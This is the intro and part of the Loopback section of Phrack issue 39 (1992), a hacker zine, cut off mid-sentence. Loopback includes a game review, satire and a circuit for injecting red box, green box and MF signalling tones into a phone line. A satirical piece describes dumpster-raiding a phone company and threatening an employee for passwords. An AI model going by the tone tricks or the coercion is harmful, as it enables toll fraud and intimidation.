7114 lines
310 KiB
Plaintext
7114 lines
310 KiB
Plaintext
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 1 of 13
|
|
|
|
Issue XXXIX Index
|
|
___________________
|
|
|
|
P H R A C K 3 9
|
|
|
|
June 26, 1992
|
|
___________________
|
|
|
|
~You're Not Dealing With AT&T~
|
|
|
|
Welcome to Phrack 39. This will be the final issue before SummerCon '92.
|
|
Details of SummerCon will appear in our special anniversary issue due late this
|
|
summer -- Phrack 40. Rumor also has it that the next issue of Mondo 2000 will
|
|
contain some type of coverage about SummerCon as well!
|
|
|
|
Phrack has been receiving an enormous amount of mail containing questions and
|
|
comments from our readers and we really appreciate the attention, but we don't
|
|
know what to do with it all. Phrack Loopback was created to address letters of
|
|
this sort, but in a lot of cases, the senders of the mail are not indicating if
|
|
their question is to be posted to Loopback or if they are to be identified as
|
|
the author of their question in Loopback.
|
|
|
|
Dispater has been moving all across the country over the past couple of months,
|
|
which is the primary reason for the delay in releasing this issue. However,
|
|
now that he is settled, the fun is about to begin. He will be responding to
|
|
your mail very soon and hopefully this will all be sorted out by issue 40.
|
|
For right now, you can enjoy a variety of special interest articles and letters
|
|
in this issue's Loopback, including "A Review of Steve Jackson Games' HACKER"
|
|
by Deluge. Special thanks goes out to Mentor and Steve Jackson for a copy of
|
|
the game and the totally cool looking poster. "Association of Security
|
|
Sysadmins" is my favorite! ;)
|
|
|
|
Another problem situation that needs to be mentioned has to do with would-be
|
|
subscribers. For some reason the "phracksub@stormking.com" account has been
|
|
receiving hundreds of requests from people who want to be added to the
|
|
subscription list. This isn't how it works. You must subscribe yourself, we
|
|
can't and won't do it for you. The instructions are included later in this
|
|
file. Up till this point we have been informing people of their error and
|
|
mailing them the instructions, but we will ignore these requests from now on.
|
|
Anyone with an intelligence level high enough to enjoy Phrack should be capable
|
|
of figuring out how to subscribe.
|
|
|
|
Phrack Pro-Phile focuses on Shadow Hawk 1 -- The first hacker ever to be
|
|
prosecuted under the Computer Fraud & Abuse Act of 1986. A lot of people don't
|
|
realize that Robert Morris, Jr. was not the first because Shadow Hawk 1 was
|
|
tried as a minor and therefore a lot of details in his case are not publicly
|
|
known. Something to point out however is that the same people (William J. Cook
|
|
and Henry Klupfel) that were responsible for prosecuting SH1 in 1989, came back
|
|
in 1990 to attack Knight Lightning... but this time the government and Bellcore
|
|
didn't fare as well and now both Cook and Klupfel (among others) are being sued
|
|
in Federal Court in Austin, Texas (See Steve Jackson Games v. United States).
|
|
|
|
Now, before anyone starts flying off their keyboards screaming about our
|
|
article "Air Fone Frequencies" by Leroy Donnelly, we will let you know what's
|
|
what. Yes, the same article did recently appear in Informatik, however, both
|
|
publications received it from the same source (Telecom Digest) and Informatik
|
|
just had an earlier release date. At Phrack, we feel that the information was
|
|
interesting and useful enough that our readers deserved to see it and we do not
|
|
assume by any means that everyone on the Phrack list is also a reader of
|
|
publications like Telecom Digest or Informatik.
|
|
|
|
Phrack's feature article in this issue is "The Complete Guide To The DIALOG
|
|
Information Network" by Brian Oblivion. Our undying gratitude to Mr. Oblivion
|
|
for his consistency in providing Phrack and its readers with entertaining
|
|
quality articles... and we're told that the best is yet to come.
|
|
|
|
Longtime fans of Phrack might recall that Phrack 9 had an article on Dialog
|
|
services and it also had an article on Centigram Voice Mail. Now 30 issues
|
|
later, both topics are resurrected in much greater detail.
|
|
|
|
You will also note that the Centigram article in this issue is penned under the
|
|
pseudonym of ">Unknown User<," a name that was adopted from the anonymous
|
|
posting feature of the Metal Shop Private bulletin board (the birthplace of
|
|
Phrack, sysoped by Taran King during 1985-1987). The name ">Unknown User<" has
|
|
traditionally been reserved for authors who did not wish to be identified in
|
|
any capacity other than to the Phrack editors. In this case, however, even the
|
|
staff at Phrack has absolutely no idea who the author of this file is because
|
|
of the unique way of SMTP Fakemail it was delivered.
|
|
|
|
No Pirates' Cove in this issue. Be watching for the next Pirates' Cove in
|
|
Phrack 40.
|
|
|
|
- - - - - - - -
|
|
|
|
Knight Lightning recently spoke at the National Computer Security Association's
|
|
Virus Conference in Washington, D.C. His presentation panel which consisted
|
|
of himself, Winn Schwartau (author of Terminal Compromise), and Michael
|
|
Alexander (chief editor of ISPNews and formally an editor and reporter for
|
|
ComputerWorld) was very well received and the people attending the conference
|
|
appeared genuinely interested in learning about the hacking community and
|
|
computer security. KL remarked that he felt really good about the public's
|
|
reaction to his presentation because "its the first time, I've agreed to be on
|
|
one of these panels and someone in the audience hasn't made accusatory or
|
|
derogatory remarks."
|
|
|
|
"It's inappropriate for you to be here."
|
|
|
|
This was the warm reception KL and a few others received upon entering the
|
|
room where the secret midnight society anti-virus group was holding a meeting.
|
|
It appears that a small number of anti-virus "experts" have decided to embark
|
|
on a mission to rid the country of computer bulletin boards that allow the
|
|
dissemination of computer viruses... by any means possible, including the
|
|
harassment of the sysops (or the sysops' parents if the operator is a minor).
|
|
|
|
At Phrack, some of us feel that there are no good viruses and are opposed to
|
|
their creation and distribution. Others of us (e.g. Dispater) just think
|
|
viruses are almost as boring as the people who make a carear out of
|
|
exterminating them. However, we do not agree with the method proposed by this
|
|
organization and will be watching.
|
|
|
|
- - - - - - - - - -
|
|
|
|
Special thanks for help in producing this issue:
|
|
|
|
Beta-Ray Bill Crimson Flash (512)
|
|
Datastream Cowboy Deluge
|
|
Dispater, EDITOR Dokkalfar
|
|
Frosty (of CyberSpace Project) Gentry
|
|
The Iron Eagle (of Australia) JJ Flash
|
|
Knight Lightning, Founder Mr. Fink
|
|
The Omega [RDT][-cDc-] The Public
|
|
Rambone Ripper of HALE
|
|
Tuc White Knight [RDT][-cDc-]
|
|
|
|
We're Back and We're Phrack!
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
HOW TO SUBSCRIBE TO PHRACK MAGAZINE
|
|
|
|
The distribution of Phrack is now being performed by the software called
|
|
Listserv. All individuals on the Phrack Mailing List prior to your receipt of
|
|
this letter have been deleted from the list.
|
|
|
|
If you would like to re-subscribe to Phrack Inc. please follow these
|
|
instructions:
|
|
|
|
1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail
|
|
must be sent from the account where you wish Phrack to be delivered.
|
|
|
|
2. Leave the "Subject:" field of that letter empty.
|
|
|
|
3. The first line of your mail message should read:
|
|
SUBSCRIBE PHRACK <your name here>
|
|
|
|
4. DO NOT leave your address in the name field!
|
|
(This field is for PHRACK STAFF use only, so please use a full name)
|
|
|
|
Once you receive the confirmation message, you will then be added to the Phrack
|
|
Mailing List. If you do not receive this message within 48 hours, send another
|
|
message. If you STILL do not receive a message, please contact
|
|
"SERVER@STORMKING.COM".
|
|
|
|
You will receive future mailings from "PHRACK@STORMKING.COM".
|
|
|
|
If there are any problems with this procedure, please contact
|
|
"SERVER@STORMKING.COM" with a detailed message.
|
|
|
|
You should get a conformation message sent back to you on your subscription.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Table Of Contents
|
|
~~~~~~~~~~~~~~~~~
|
|
1. Introduction by Dispater and Phrack Staff 12K
|
|
2. Phrack Loopback by Phrack Staff 24K
|
|
3. Phrack Pro-Phile on Shadow Hawk 1 by Dispater 8K
|
|
4. Network Miscellany V by Datastream Cowboy 34K
|
|
5. DIALOG Information Network by Brian Oblivion 43K
|
|
6 Centigram Voice Mail System Consoles by >Unknown User< 36K
|
|
7. Special Area Codes II by Bill Huttig 17K
|
|
8. Air Fone Frequencies by Leroy Donnelly 14K
|
|
9. The Open Barn Door by Douglas Waller (Newsweek) 11K
|
|
10. PWN/Part 1 by Datastream Cowboy 30K
|
|
11. PWN/Part 2 by Datastream Cowboy 27K
|
|
12. PWN/Part 3 by Datastream Cowboy 29K
|
|
13. PWN/Part 4 by Datastream Cowboy 29K
|
|
|
|
Total: 314K
|
|
|
|
"Phrack. If you don't get it, you don't get it."
|
|
|
|
phracksub@stormking.com
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
Somebody Watching? Somebody Listening?
|
|
|
|
*** Special Announcement ***
|
|
|
|
KNIGHT LIGHTNING TO SPEAK AT SURVEILLANCE EXPO '92
|
|
Washington, DC
|
|
|
|
The Fourth Annual International Surveillance and Countersurveillance Conference
|
|
and Exposition focusing on Information Security and Investigations Technology
|
|
will take place at the Sheraton Premiere in Tysons Corner (Vienna), Virginia on
|
|
August 4-7.
|
|
|
|
The seminars are on August 7th and include Craig Neidorf (aka Knight Lightning)
|
|
presenting and discussing the following:
|
|
|
|
- Are law enforcement and computer security officials focusing their
|
|
attention on where the real crimes are being committed?
|
|
|
|
- Should security holes and other bugs be made known to the public?
|
|
|
|
- Is information property and if so, what is it worth?
|
|
|
|
Experience the case that changed the way computer crime is investigated
|
|
and prosecuted by taking a look at one of America's most talked about
|
|
computer crime prosecutions: United States v. Neidorf (1990).
|
|
|
|
Exonerated former defendant Craig Neidorf will discuss the computer
|
|
"hacker" underground, Phrack newsletter, computer security, and how it all
|
|
came into play during his 7 month victimization by some of our nation's
|
|
largest telephone companies and an overly ambitious and malicious federal
|
|
prosecutor. Neidorf will speak about his trial in 1990 and how the court
|
|
dealt with complex issues of First Amendment rights, intellectual
|
|
property, and criminal justice.
|
|
|
|
Security professionals, government employees, and all other interested parties
|
|
are invited to attend. For more information please contact:
|
|
|
|
American Technology Associates, Inc.
|
|
P.O. Box 20254
|
|
Washington, DC 20041
|
|
(202)331-1125 Voice
|
|
(703)318-8223 FAX
|
|
_______________________________________________________________________________
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 2 of 13
|
|
|
|
[-=:< Phrack Loopback >:=-]
|
|
|
|
By Phrack Staff
|
|
|
|
Phrack Loopback is a forum for you, the reader, to ask questions, air
|
|
problems, and talk about what ever topic you would like to discuss. This is
|
|
also the place Phrack Staff will make suggestions to you by reviewing various
|
|
items of note; magazines, software, catalogs, hardware, etc.
|
|
_______________________________________________________________________________
|
|
|
|
A Review of Steve Jackson Games' HACKER
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Deluge
|
|
|
|
They had to get around to it eventually. While I was scanning the game section
|
|
at the not-so-well-stocked game and comic store where I shop on occasion, I saw
|
|
something that caught my eye: A game called "Hacker" by Steve Jackson Games.
|
|
|
|
What you see on the cover gives you a clue that this game is a bit more than
|
|
the typical trash we see about hackers. Here we have a guy with a leather
|
|
jacket with a dinosaur pin, John Lennon shades, a Metallica shirt, and a really
|
|
spiffy spiked hairdo. This guy has an expression with a most wicked grin, and
|
|
his face is bathed in the green glow of a monitor. Various decorations in the
|
|
room include a model rocket, a skateboard, a pizza box, and a couple of Jolt
|
|
Cola cans. Behind him, hanging on his wall, are a couple of posters, one which
|
|
says, "Legion of Doom Internet World Tour," and another which says, "Free the
|
|
Atlanta Three." On his bookshelf, we see a copy of Neuromancer, Illuminati
|
|
BBS, and The Phoenix-- (I assume "Project" follows, and don't ask me why this
|
|
guy has BBSes in his bookshelf). Finally, there's a note tacked to the LOD
|
|
poster that says "PHRACK SummerCon CyberView, St. Louis" which appears to be an
|
|
invitation of some kind.
|
|
|
|
This struck me as quite interesting.
|
|
|
|
Twenty bucks interesting, as it turns out, and I think it was twenty well
|
|
spent. Now don't tell me Steve Jackson Games has no significance for you
|
|
(sigh). Ok, here is how Steve tells it (in the intro to the game):
|
|
|
|
-----
|
|
|
|
"In 1990, Steve Jackson Games was raided by the U.S. Secret Service during a
|
|
'hacker hunt' that went disastrously out of control. We lost several
|
|
computers, modems, and other equipment. Worse, we lost the manuscripts to
|
|
several uncompleted games, most notably _GURPS Cyberpunk_, which a Secret
|
|
Service agent the next day called 'a handbook for computer crime.' The company
|
|
had to lay off half its staff, and narrowly avoided bankruptcy.
|
|
|
|
"Eventually we got most of our property back (though some of it was damaged or
|
|
destroyed). The Secret Service admitted that we'd never been a target of their
|
|
investigation. We have a lawsuit pending against the officials and agencies
|
|
responsible.
|
|
|
|
"But since the day of the raid, gamers have been asking us, 'When are you going
|
|
to make a game about it?' Okay. We give up. Here it is. Have fun."
|
|
|
|
-----
|
|
|
|
Weeeell...everybody naturally wants to look as good as they can, right? For
|
|
the real lowdown on the whole situation, a scan through some old CUDs would be
|
|
in order, where you could find a copy of the warrant which authorized this
|
|
raid. I can tell you that Loyd Blankenship is the author of SJG's _GURPS
|
|
Cyberpunk_, so draw your own conclusions.
|
|
|
|
Hacker is played with cards. This does NOT, in my view, make it a card game,
|
|
though it is advertised that way. It's pretty similar to Illuminati, requiring
|
|
a lot of diplomacy, but it has a totally different flavor.
|
|
|
|
The goal here is to become the mondo superhacker king of the net by getting
|
|
access on twelve systems. You build the net as you go along, upgrading your
|
|
system, hacking systems, and looking for ways to screw your fellow hackers so
|
|
they can't be king of the net before you can get around to it. While the
|
|
hacking aspect is necessarily resolved by a dice roll, the other aspects of
|
|
this game ring true. They distinguish between regular and root access on
|
|
systems, have specific OSes, specific net types, NetHubs, secret indials, back
|
|
doors, and, of course, the feds, which range from local police to combined
|
|
raids from the FBI and other government authorities.
|
|
|
|
This is a good game all on its own. It's fun, it has a fair amount of
|
|
strategy, lots of dirty dealing, and a touch of luck to spice things up. And
|
|
if things get too hairy and blood is about to flow, they inevitably cool down
|
|
when someone uses a special card. Quite a few of these are funny as hell.
|
|
Some examples:
|
|
|
|
Trashing: Somebody threw away an old backup disk. Bad idea. You can leave
|
|
them e-mail about it...from their own account.
|
|
|
|
Get A Life: A new computer game ate your brain. 100 hours later, you beat it,
|
|
and you're ready to get back to hacking, but you get only one hack
|
|
this turn. There is another one of these about meeting a member
|
|
of the opposite sex and briefly entertaining the notion that there
|
|
is more to life than hacking.
|
|
|
|
Original Manuals: The official system manuals explain many possible security
|
|
holes. This is good. Some system administrators ignore
|
|
them. This is bad. They usually get away with it because
|
|
most people don't have the manuals. This is good. But
|
|
YOU have a set of manuals. This is very interesting.
|
|
|
|
Social Engineering: "This is Joe Jones. My password didn't work. Can you
|
|
reset it to JOE for me?" There is another one of these
|
|
that says something about being the phone company checking
|
|
the modem line, what's your root password please.
|
|
|
|
And my favorite, a card designed to be played to save yourself from a raid:
|
|
|
|
Dummy Equipment: The investigators took your TV and your old Banana II, but
|
|
they overlooked the real stuff! No evidence, no bust -- and
|
|
you keep your system.
|
|
|
|
As you can see, this game goes pretty far toward catching the flavor of the
|
|
real scene, though some of it is necessarily stereotypical. Well, enough
|
|
praise. Here are a couple of gripes.
|
|
|
|
The game is LONG. A really nasty group of players can keep this going for
|
|
hours. That isn't necessarily a bad thing, but be forewarned. A few
|
|
modifications to shorten it up are offered, but the short game is a little like
|
|
masturbating. Just not as good as the real thing.
|
|
|
|
There was too much work to get the game ready to play. I've gotten used to
|
|
some amount of setting up SJGs, and believe me, I would not have bought more
|
|
unless they were good, and they always are, but the setup has not usually been
|
|
such a pain. HACKER has a lot of pieces, and a lot of them come on a single
|
|
page, requiring you to hack them out with scissors and hope you don't do
|
|
something retarded like cut the wrong thing off. Once I got done with this,
|
|
everything was cool, but this was a real pain.
|
|
|
|
So, overall, what do I think? Four stars. If you play games, or if you're
|
|
just massively hip to anything about hacking, get this game. You're gonna need
|
|
at least three players, preferably four or five (up to six can play), so if
|
|
you only know one person, don't bother unless you have some hope of getting
|
|
someone else to game with you.
|
|
|
|
And when Dr. Death or the K-Rad Kodez Kid calls you up and wonders where you've
|
|
been lately, just tell him you're busy dodging feds, covering your tracks, and
|
|
hacking for root in every system you find in your quest to call yourself king
|
|
of the net, and if he doesn't support you...well, you know what to do with
|
|
posers who refuse to believe you're God, don't you?
|
|
|
|
Muahahahahahahaahaha!
|
|
_______________________________________________________________________________
|
|
|
|
CPSR Listserv
|
|
~~~~~~~~~~~~~
|
|
Computer Professionals for Social Responsibility (CPSR) has set up a list
|
|
server to (1) archive CPSR-related materials and make them available on
|
|
request, and (2) disseminate relatively official, short, CPSR-related
|
|
announcements (e.g., press releases, conference announcements, and project
|
|
updates). It is accessible via Internet and Bitnet e-mail. Mail traffic will
|
|
be light; the list is set up so that only the CPSR Board and staff can post to
|
|
it. Because it is self-subscribing, it easily makes material available to a
|
|
wide audience.
|
|
|
|
We encourage you to subscribe to the list server and publicize it widely,
|
|
to anyone interested in CPSR's areas of work.
|
|
|
|
To subscribe, send mail to:
|
|
|
|
listserv@gwuvm.gwu.edu (Internet) OR
|
|
listserv@gwuvm (Bitnet)
|
|
|
|
Your message needs to contain only one line:
|
|
|
|
subscribe cpsr <your first name> <your last name>
|
|
|
|
You will get a message that confirms your subscription. The message also
|
|
explains how to use the list server to request archived materials (including
|
|
an index of everything in CPSR's archive), and how to request more information
|
|
about the list server.
|
|
|
|
Please continue to send any CPSR queries to cpsr@csli.stanford.edu.
|
|
|
|
If you have a problem with the list server, please contact the administrator,
|
|
Paul Hyland (phyland@gwuvm.gwu.edu or phyland@gwuvm).
|
|
|
|
We hope you enjoy this new service.
|
|
_______________________________________________________________________________
|
|
|
|
TRW Allows Inspection
|
|
~~~~~~~~~~~~~~~~~~~~~
|
|
According to USA Today, as of April 30, you can get a free copy of your TRW
|
|
credit report once a year by writing to:
|
|
|
|
TRW Consumer Assistance
|
|
P.O. Box 2350
|
|
Chatsworth, CA 91313-2350
|
|
|
|
Include all of the following in your letter:
|
|
|
|
- Full name including middle initial and generation such as Jr, Sr, III etc.
|
|
- Current address and ZIP code.
|
|
- All previous addresses and ZIPs for past five years.
|
|
- Social Security number.
|
|
- Year of birth.
|
|
- Spouse's first name.
|
|
|
|
- A photocopy of a billing statement, utility bill, driver's license or other
|
|
document that links your name with the address where the report should be
|
|
mailed.
|
|
_______________________________________________________________________________
|
|
|
|
The POWER Computer Lives!
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Do the words of the prophet Abraham Epstein ring true? (Remember him from his
|
|
correspondence in Phrack 36 Loopback?)
|
|
|
|
If you don't believe that The IBM/TV Power Computer and is attempting to take
|
|
over the world then read the following and judge for yourself.
|
|
|
|
o IBM is the worlds largest corporation.
|
|
|
|
o IBM has more in assets than most small countries.
|
|
|
|
o In 1991 IBM and it's arch enemy, Apple Computer, have joined forces to build
|
|
the POWER computer.
|
|
|
|
o The POWER computer will replace all existing Macintosh, PS/2, and
|
|
RS/6000 machines.
|
|
|
|
o The POWER architecture will be licenced to third-party companies in order
|
|
that they may build their own POWER computers.
|
|
|
|
o With both Apple Computer (QuickTime) and IBM (Ultimedia) advancing their
|
|
work on Multimedia, it can only mean that the POWER computer will speak
|
|
through TV.
|
|
|
|
- - - - - - - - -
|
|
|
|
Here are some quotes from Harley Hahn of IBM's Advanced Workstation Division:
|
|
|
|
"PowerOpen is a computing architecture based on AIX and the POWER
|
|
Architecture. To that we've added the PowerPC architecture [a low-
|
|
end implementation if POWER ] and the Macintosh interface and
|
|
applications."
|
|
|
|
"Our goal is to create the major RISC computing industry standard
|
|
based on the PowerPC architecture and the PowerOpen environment."
|
|
|
|
"Eventually all our workstations will use POWER"
|
|
|
|
- - - - - - - - -
|
|
|
|
Here's a quote from Doug McLean of Apple Computer:
|
|
|
|
"It is our intention to replace the 68000 in our entire line of
|
|
Macintosh computers with PowerPC chips."
|
|
|
|
- - - - - - - - -
|
|
|
|
The PROPHECY IS COMING TRUE. We have no time to lose. Unless we act quickly
|
|
the world will come to an abrupt end as the POWER COMPUTER passes wind on all
|
|
of us.
|
|
|
|
Abraham Epstein [Big Daddy Plastic Recycling Corporation]
|
|
[Plastic Operations With Energy Resources (POWER)]
|
|
_______________________________________________________________________________
|
|
|
|
Major Virus Alert
|
|
~~~~~~~~~~~~~~~~~
|
|
George Bush Virus - Doesn't do anything, but you can't get rid of it
|
|
until November.
|
|
Ted Kennedy Virus - Crashes your computer, but denies it ever happened.
|
|
Warren Commission Virus - Won't allow you to open your files for 75 years
|
|
Jerry Brown Virus - Blanks your screen and begins flashing an 800 number.
|
|
David Duke Virus - Makes your screen go completely white.
|
|
Congress Virus - Overdraws your disk space.
|
|
Paul Tsongas Virus - Pops up on Dec. 25 and says "I'm Not Santa Claus."
|
|
Pat Buchanan Virus - Shifts all output to the extreme right of the screen.
|
|
Dan Quayle Virus - Forces your computer to play "PGA TOUR" from 10am to
|
|
4pm, 6 days a week
|
|
Bill Clinton Virus - This virus mutates from region to region. We're not
|
|
exactly sure what it does.
|
|
Richard Nixon Virus - Also know as the "Tricky Dick Virus." You can wipe
|
|
it out, but it always makes a comeback.
|
|
H. Ross Perot Virus - Same as the Jerry Brown virus, only nicer fonts are
|
|
used, and it appears to have had a lot more money put
|
|
into its development.
|
|
_______________________________________________________________________________
|
|
|
|
AUDIO LINKS
|
|
~~~~~~~~~~~
|
|
By Mr. Upsetter
|
|
|
|
It all started with my Macintosh...
|
|
|
|
Some time ago I had this crazy idea of connecting the output from the audio
|
|
jack of my Macintosh to the phone line. Since the Macintosh has built in sound
|
|
generation hardware, I could synthesize any number of useful sounds and play
|
|
them over the phone. For instance, with a sound editing program like
|
|
SoundEdit, it is easy to synthesize call progress tones, DTMF and MF tones, red
|
|
box, green box, and other signalling tones. So I set out to do exactly this.
|
|
I created a set of synthesized sounds as sound resources using SoundEdit. Then
|
|
I wrote a HyperCard stack for the purpose of playing these sounds. Now all I
|
|
needed was a circuit to match the audio signal from the headphone jack of my
|
|
Mac to the phone line.
|
|
|
|
|
|
How The Circuit Works
|
|
~~~~~~~~~~~~~~~~~~~~~
|
|
I designed a simple passive circuit that does the job quite well. Here is the
|
|
schematic diagram.
|
|
|
|
+------+ T1 +------+
|
|
o-----| R1 |-----o------o--------(| |)-----| C1 |-----o-----o
|
|
+------+ +| -| (| |) +------+ |
|
|
+---+ +---+ (| |) +---+
|
|
to Mac | D | | D | 8 (| |) 500 |VR | to
|
|
headphone | 1 | | 2 | ohm (| |) ohm | 1 | phone
|
|
jack +---+ +---+ (| |) +---+ line
|
|
-| +| (| |) |
|
|
o------------------o------o--------(| |)------------------o-----o
|
|
|
|
C1-.22 uF, 200V
|
|
D1,D2- 1N4148 switching diode
|
|
R1-620 ohm, 1/4W
|
|
T1- 8 ohm to 500 ohm audio transformer, Mouser part 42TL001
|
|
VR1-300V MOV, Mouser part 570-V300LA4
|
|
|
|
VR1 is a 300V surge protector to guard against transient high voltages.
|
|
Capacitor C1 couples the phone line to transformer T1, blocking the phone
|
|
line's DC voltage but allowing the AC audio signal to pass. The transformer
|
|
matches the impedance of the phone line to the impedance of the headphone jack.
|
|
Diodes D1 and D2 provide clipping for additional ringing voltage protection
|
|
(note their polarity markings in the schematic). They will clip any signal
|
|
above 7 volts. Resistor R1 drops the volume of the audio signal from the Mac
|
|
to a reasonable level. The end result is a circuit that isolates the Mac from
|
|
dangerous phone line voltages and provides a good quality audio link to the
|
|
phone line.
|
|
|
|
|
|
Building and Using the Circut
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
This simple circuit is easy to build (if you're handy with electronics). I
|
|
personally prefer to solder the circuit together. A length of shielded audio
|
|
cable with a 1/8 inch mono plug on one end should be connected to the audio
|
|
input end of the circuit. A standard RJ11 phone jack should be connected to
|
|
the phone line end of the circuit. Although this circuit will protect against
|
|
dangerous phone line voltages, it is best to disconnect it when not in use.
|
|
You just don't want to risk anything bad happening to your brand new Quadra
|
|
900, right?
|
|
|
|
Once you have an audio link between your Mac and the phone line, the
|
|
applications are limitless. Use HyperCard's built-in DTMF dialing to dial for
|
|
you, or build a memory dialer stack. Talk to people with Macintalk. Play your
|
|
favorite Ren and Stimpy sounds for your friends. Play a ringback tone to
|
|
"transfer" people to an "extension". Build and use a set of synthesized MF
|
|
tones. Try to trick COCOT's with synthesized busy and reorder signals.
|
|
|
|
|
|
But Wait, There Is More...
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
So you say you don't own a Macintosh? That is ok, because the circuit can be
|
|
used with other devices besides your Mac. You can use it with the 8 ohm
|
|
headphone output from tape recorders, radios, scanners, etc. You could also
|
|
probably use it with any other computer as long as you had the proper audio D/A
|
|
hardware and software to create sounds.
|
|
|
|
All parts are available from Mouser Electronics. Call 800-346-6873 for a free
|
|
catalog.
|
|
_______________________________________________________________________________
|
|
|
|
Thank You Disk Jockey!
|
|
~~~~~~~~~~~~~~~~~~~~~~
|
|
Date: May 22, 1992
|
|
From: Sarlo
|
|
To: Phrack
|
|
Subject: The Disk Jockey
|
|
|
|
I was searching through some Phracks (issues 30-38), just checking them out and
|
|
noticed something. It's small and insignificant, I guess, but important to me
|
|
all the same.
|
|
|
|
I noticed in Disk Jockey's Prophile (Phrack 34, File 3) that he "Never got any
|
|
thanks for keeping his mouth shut."..I dunno how to get ahold of him or
|
|
anything, but if you drop a line to him sometime, tell him I said "thanks."
|
|
|
|
-Sarlo
|
|
_______________________________________________________________________________
|
|
|
|
An Upset Reader Responds To Knight Lightning and Phrack
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Date: Mon, 20 Apr 92 16:57 GMT
|
|
From: "Thomas J. Klotzbach" <0003751365@mcimail.com>
|
|
To: Knight Lightning <kl@stormking.com>
|
|
Subject: In response to your comments of Phrack Vol 4, Issue 37, File 2 of 14
|
|
|
|
Hi,
|
|
|
|
I have a lot of respect for Phrack and all the work they are doing to
|
|
promote an understanding of the Computer Underground. But your comments in the
|
|
latest issue of Phrack are what I would like to comment on.
|
|
|
|
You say:
|
|
|
|
"In short -- I speak on behalf of the modem community in general,
|
|
'FUCK OFF GEEK!' Crawl back under the rock from whence you came
|
|
and go straight to hell!"
|
|
|
|
First, you don't speak for me and about five other people at this college.
|
|
I have maintained throughout that the ONLY way to further the efforts of the
|
|
Computer Underground is to destroy them with logic - not with creton-like
|
|
comments. Yes, you are entitled to your say - but why not take this Dale Drew
|
|
person and destroy him with logic? The minute that you descend to the level
|
|
Dale Drew operates from makes you look just as ridiculous as him.
|
|
|
|
In my opinion, you came off very poorly in the exchange with Dale Drew.
|
|
|
|
Thomas J. Klotzbach MCI Mail: 375-1365
|
|
Genesee Community College Internet: 3751365@mcimail.com
|
|
Batavia, NY 14020 Work: (716) 343-0055 x358
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Dear Mr. Klotzbach,
|
|
|
|
>From all of us at Phrack, this is our reply to your recent email...
|
|
|
|
*******************************************************************************
|
|
|
|
Cyber-Redneck & Shitkickin' Jim's
|
|
GUIDE TO MANLY HACKING
|
|
|
|
A Lod/GoD Presentation
|
|
Legion of d0oDeZ / Gardeners of Doom!
|
|
|
|
"You can have my encryption algorithm,
|
|
when you pry it from my cold dead fingers!"
|
|
|
|
|
|
*******************************************************************************
|
|
|
|
NOW BOYS... first of all, you gotta git yerself a pickup truck. Shitkickin'
|
|
Jim's got one. And you gotta get a bedliner, a toolbox, a gunrack, and a CB.
|
|
For decoration, you have to get a confederate flag Hank Williams Jr. license
|
|
plate, or a Harley Davidson license plate, at your option. You also gotta get
|
|
an NRA sticker for the back, and the Bassmaster fishing sticker (you know, the
|
|
one that's has a fish on it). The most mandatory requirement are two antennaes
|
|
for your CB which are mounted on each of the side view mirrors.
|
|
|
|
Now that you have your pickup truck/hackermobile, you gotta rip out the
|
|
dashboard and mount a Data General processing unit in the front seat, cuz
|
|
that's a manly-sounding computer name, not some pussy sounding 'puter. You
|
|
also have to get an Anchorman direct-connect modem, cuz that's the only thing
|
|
left that your battery will be able to power.
|
|
|
|
Not only do you have to have a pickup truck, but you gotta have rollbars, with
|
|
foglights, armed with KC light covers so that you can see at night while you're
|
|
trashing.
|
|
|
|
THE MANLY WAY FOR A NIGHT OF HACKING
|
|
|
|
NOTE: Before you begin any journey in the hackmobile, you must get a six pack
|
|
of Budweiser, and a carton of Marlboro reds. It's mandatory.
|
|
|
|
Call up your buddy who owns his own trash business. If you are a real man, ALL
|
|
of your friends will work in this business. Get him to take the company truck
|
|
out (the deluxe model -- the Hercules trash truck, the one with the forklift on
|
|
the front).
|
|
|
|
HOW REAL MEN GO TRASHING
|
|
|
|
Drive down to your local Bell office or garage, and empty all of the dumpsters
|
|
into the trashtruck, by way of the convenient forklift. This method has
|
|
brought both me and Shitkickin' Jim much luck in the way of volume trashing.
|
|
|
|
Now that you have all of your trash, go back and dump it in your backyard. If
|
|
you are a real man, no one will notice. Dump it between the two broke down
|
|
Chevette's, the ones that all the dogs will sleep under, next to the two
|
|
barrels of wire.
|
|
|
|
Go through the trash and find out who the geek is that is the switchman at the
|
|
central office. This shouldn't be hard. It's the little squiggly letters at
|
|
the bottom of the page.
|
|
|
|
Next, drive to his house. Pull your truck into his front yard. Threaten him
|
|
with the following useful phrase:
|
|
|
|
"HAY FAY-GUT! WUT IS THE PASSWORD TO THE LOCAL COSMOS DIALUP?"
|
|
|
|
"IFFIN YOU DON'T TELL ME, I'M GONNA RUN OVER YOUR PIECE OF SHIT RICE-BURNING
|
|
COMMUNIST JAPANESE CAR WITH MY 4 BY 4 PICKUP TRUCK, GAWDDAMIT!"
|
|
|
|
Then spit a big, brown, long tobaccoe-juice glob onto his shirt, aiming for the
|
|
Bell logo. Should he withhold any information at this point, git out of yer
|
|
truck and walk over to him. Grab him by his pencil neck, and throw him on the
|
|
ground. Place your cowboy boot over his forehead, and tell him your going to
|
|
hogtie his ass to the front of your 4 by 4 and smash him into some concrete
|
|
posts. At this point, he will give in, especially noticing the numerous guns
|
|
in the gunrack.
|
|
|
|
WHAT TO DO WITH THE INFORMATION THAT YOU HAVE COVERTLY OBTAINED
|
|
|
|
Don't even think about using a computer. Make him log on to his terminal at
|
|
home, and make him do whatever you like. Read a copy of JUGGS magazine, or
|
|
